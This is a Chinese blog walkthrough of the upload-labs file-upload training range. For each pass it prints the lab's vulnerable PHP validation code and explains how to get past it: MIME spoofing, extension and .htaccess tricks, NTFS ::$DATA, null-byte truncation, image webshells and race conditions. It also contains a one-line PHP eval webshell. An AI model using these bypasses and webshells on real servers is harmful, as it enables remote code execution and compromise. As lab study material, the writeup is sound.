upload-labs 文件上传靶场 writeup

最新推荐文章于 2024-04-17 23:08:54 发布
最新推荐文章于 2024-04-17 23:08:54 发布
阅读量1.9k 收藏 3
点赞数 1
分类专栏: writeup 文章标签: 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41575340/article/details/90976014
版权

文件上传靶场练习

前言

文件上传漏洞是一个高危漏洞,想要复习一下,二刷一下文件上传靶场

Pass-01

提示:

本pass在客户端使用js对不合法图片进行检查!

通过提示发现是在客户端用js进行验证的,js验证实在发送到服务器端之前而验证的,那么我们就可以在此之前做点手脚。

可以先上传一个合法的文件,通过抓包来进行修改参数,就可以绕过这个限制了。

Pass-02

提示

本pass在服务端对数据包的MIME进行检查!

源码为:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $_FILES['upload_file']['name'])) {
                $img_path = UPLOAD_PATH . $_FILES['upload_file']['name'];
                $is_upload = true;

            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

在http数据包中,判断文件类型的是Content-Type字段的值

同样抓包,修改Content-Type为image/jpeg

image

就可以绕过判断

Pass-03

提示:

本pass禁止上传.asp|.aspx|.php|.jsp后缀文件!

通过提示可以看出,应该是不完善的黑名单所导致的漏洞。

使用不存在于黑名单但是可执行的后缀即可

常见的可执行文件的后缀:

PHP: php2、php3、php5、phtml、pht
ASP: aspx、ascx、ashx、cer、asa
JSP: jspx

注意:想要让服务器将你的文件解析为php,还需要将要修改httpd.conf:(把前面的#去掉)

AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .php2

Pass-04

提示:

本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件!

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $_FILES['upload_file']['name'])) {
                $img_path = UPLOAD_PATH . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

这个黑名单就比较完善了,过滤了各种罕见后缀,但是没有过滤.htaccess

我们在.htaccess文件上写:

SetHandler application/x-httpd-php

意思就是把本目录下的jpeg文件当做php来解析

新建一个jpg文件,内容如下:

<?php @eval($_GET['chuddy']); ?>

然后访问上传文件的存储位置,可以发现能够被解析为php文件。

Pass-05

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $_FILES['upload_file']['name'])) {
                $img_path = UPLOAD_PATH . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

这个黑名单比前面的关卡更加完善了。过滤了.htaccess,但是代码中后缀转换为小写被去掉了,因此我们可以上传Php来绕过黑名单后缀。(在Linux没有特殊配置的情况下,这种情况只有win可以,因为win会忽略大小写)

Pass-06

查看提示发现同样是黑名店限制,几乎涵盖了所有危险的后缀,那么查看源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $_FILES['upload_file']['name'])) {
                $img_path = UPLOAD_PATH . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

win下的小技巧:Win下xx.jpg[空格]xx.jpg.这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点

此处会删除末尾的点,但是没有去掉末尾的空格,因此上传一个.php空格文件即可绕过。

Pass-07

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $_FILES['upload_file']['name'])) {
                $img_path = UPLOAD_PATH . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

此处会删除末尾的空格,但是没有去掉末尾的点,因此上传一个.php.文件即可绕过。

Pass-08

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $_FILES['upload_file']['name'])) {
                $img_path = UPLOAD_PATH . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

发现缺少::$DATA

查阅资料发现,这是利用windows操作系统的一个特性:

image

NTFS文件系统包括对备用数据流的支持。这不是众所周知的功能,主要包括提供与Macintosh文件系统中的文件的兼容性。备用数据流允许文件包含多个数据流。每个文件至少有一个数据流。在Windows中,此默认数据流称为:$ DATA
上传.php::$DATA绕过。(仅限windows)

Pass-09

is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $_FILES['upload_file']['name'])) {
                $img_path = UPLOAD_PATH . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

通过阅读源码,我们可以发现,用户上传的文件名,我们可控。且会删除文件名末尾的点和空格

结合上面几关的解题经验,我们可以发现可以通过创建文件.php.空格.来进行绕过

Pass-10

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $file_name)) {
            $img_path = UPLOAD_PATH . '/' .$file_name;
            $is_upload = true;
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

通过查看源码发现

$file_name = str_ireplace($deny_ext,"", $file_name);

将黑名单的文件名替换成空,所以我们想到可以通过双写来进行绕过。

Pass-11

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = '上传失败!';
        }
    }
    else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

影响版本:5.4.x<= 5.4.39, 5.5.x<= 5.5.23, 5.6.x <= 5.6.7
exp:move_uploaded_file($_FILES['name']['tmp_name'],"/file.php\x00.jpg");

源码中move_uploaded_file中的save_path可控,因此00截断即可。

Pass-12

方法同上,只是请求方式改为POST

Pass-13

提示

本pass检查图标内容开头2个字节!

我们可以伪造一下文件头的信息

常用文件头:
(1) .JPEG;.JPE;.JPG,”JPGGraphic File”
(2) .gif,”GIF 89A”
(3) .zip,”Zip Compressed”
(4) .doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach APRfile”

Pass-14

本关可以通过制作图片马进行绕过

制作图片马的方法:


在Windows的cmd中执行命令:


copy 图片名/b+ 木马文件/a 合成的图片马名

Pass-15

同14关

Pass-16

主要是二次渲染绕过

jpg和png很麻烦,gif只需要找到渲染前后没有变化的位置,然后将php代码写进去,就可以了。

二次渲染的详解

Pass-17

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传失败!';
    }
}

可以看到文件先经过保存,然后判断后缀名是否在白名单中,如果不在则删除,此时可以利用条件竞争在保存文件后删除文件前来执行php文件。

一边用bp一直上传木马文件,一边用脚本一直访问该临时文件,就能成功执行命令。

Pass-18

原理同17一样,都是利用条件竞争

Pass-19

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传失败!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

这里需要注意的是move_uploaded_file会忽略掉文件末尾的/.这里是用户可控的。所以我们可以伪造这样的上传

image

总结

感觉这个图总结的特别详细。

image

自己还是很菜,还要继续努力呀!

qq_41575340
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件漏洞(upload-labs)复现(1~9)
net的博客
02-23 767
在上述配置中,FilesMatch表示匹配4.png的文件,当该文件名匹配成功后,SetHandler表示将该文件作为PHP类型的文件来进行处置。复制文件的路径,请求 GET /upload/upload/20200304.php5?④复制文件的路径,请求GET /upload/upload/webshell.php?①分析源码,黑名单包括了几乎所有php后缀文件,但是并没有屏蔽后缀为.htaccess的文件。②上png后缀的webshell,代理抓包,修改上文件后缀 (推荐);
前端判断上文件是否为同一个文件_文件漏洞uploadlabs靶场16关
weixin_39959126的博客
12-16 1082
文件漏洞upload-labs靶场文件靶场环境:https://github.com/c0ny1/upload-labsLess1 前端JS绕过0x01 Less1说明查看源代码function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file =...
upload-labs靶场详解
最新发布
lizhiiiii的博客
04-17 973
使用小皮集成环境来完成这个靶场文件放到WWW目录下就可以进行访问。
docker 安装upload-lobs上提示../upload 文件不存在解决
dahe
05-23 491
进入容器 docker exec -it 50ccef48fc1d /bin/bash 在/var/www/html目录下添加upload文件夹 然后赋予777权限,即可
upload-labs-master靶机闯关总结
Alexz__的博客
10-14 2246
此靶机上的都是此一句马文件 <?php class test {function assert(){$f = __FUNCTION__ ;@$f($_POST['shell']);}}$t = new test();$t->assert(); ?> 部分少有的曲线(救国)木马会在相应的pass里面贴出来 <?php 直奔主题 ?> p...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件漏洞设计的平台,它提供了21个关卡,从基础...
upload-labs文件靶场
11-24
upload-labs:深入探索文件漏洞的靶场实践》 在网络安全领域,尤其是Web安全中,文件漏洞是一项常见的安全隐患。"upload-labs"是一个专门为渗透测试者和CTF(Capture The Flag)参赛者设计的PHP语言编写...
PHP、Apache环境中部署upload-labs(文件漏洞靶场)
01-08
这就是 upload-labs文件漏洞靶场)的价值所在。 upload-labs 是一款开源的练习 web 漏洞的靶场工具,用 PHP 代码编写而成。需要 PHP 和 Apache 环境运行。下面我们将详细介绍如何在 PHP、Apache 环境中部署 ...
upload-labs-master【文件靶场
04-05
"upload-labs-master【文件靶场】" 是一个针对文件功能安全性的测试平台,主要目的是帮助开发者、安全人员以及爱好者检验和学习文件漏洞的防范措施。在这个靶场中,你可以模拟不同的攻击手段,了解如何...
文件漏洞靶场upload-labs
09-27
【上文件漏洞靶场upload-labs】是一个专为网络安全爱好者和初学者设计的实践平台,主要目的是帮助用户深入了解和练习上文件漏洞。在Web应用程序中,上功能常常因为设计不当而成为攻击者利用的安全隐患。这个...
web安全-文件漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6178
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件时,在我们上文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
关于upload-labs缺少upload文件夹和docker image到底在哪的坑
fanxiaoyao1的博客
04-24 355
今天搭建upload-labs的训练环境,提示需要我自己创建一个upload文件夹,但是我用的是linux,找了半天没找到docker pull下来的镜像文件夹在哪,我用find /var/lib/docker -name upload-labs文件夹,结果搜不出来,其实docker pull下来就好像压根不叫那个了,是一个sha256加密的字符串。我只能从侧面切入,find /var/lib/docker -name head.php这个head.php是作者写的一个头文件,结果找到在/var/lib/
upload-labs漏洞靶场环境以及writeup
iqiqiya的博客
09-07 4548
一个帮你总结所有类型的上漏洞的靶场https://github.com/c0ny1/upload-labs 靶场环境(基于phpstudy这个php集成环境)https://github.com/c0ny1/upload-labs/releases upload-labs漏洞靶场的解题方法https://github.com/LandGrey/upload-labs-writeup ...
upload上 内容绕过_upload-labs writeup
weixin_39629352的博客
11-21 437
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上漏洞的靶场。旨在帮助大家对上漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上方式。github地址:https://github.com/c0ny1/upload-labs靶机包含漏洞类型分类: 如何判断上漏洞类型: 以下是我做题的过程,建议首先黑盒测试,做不出的题再看源码。pass-01 前...
文件-uploadlab通关手册
李安北的博客
05-03 3412
11
upload-labs writeup
dianmangji9200的博客
08-04 406
其它的writeup https://github.com/LandGrey/upload-labs-writeup https://cloud.tencent.com/developer/article/1377897 https://www.360zhijia.com/anquan/442566.html upload-labs安装 下载地址:https://github.com/c...
upload-labs 1-6关学习笔记
weixin_51151498的博客
10-27 793
简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上漏洞的靶场。旨在帮助大家对上漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上方式。
[渗透测试笔记] 04.文件upload-labs
H4ppyD0g的博客
10-02 929
知识框图 Pass-01——本pass在客户端使用js对不合法图片进行检查! 看下js源码,设置了白名单,必须为三种格式中的一种,可以用burp抓包修改一下后缀名。 可以上一句话木马,然后菜刀连接。 function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (...
upload-labs靶场通关指南
07-02
upload-labs靶场通关指南

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值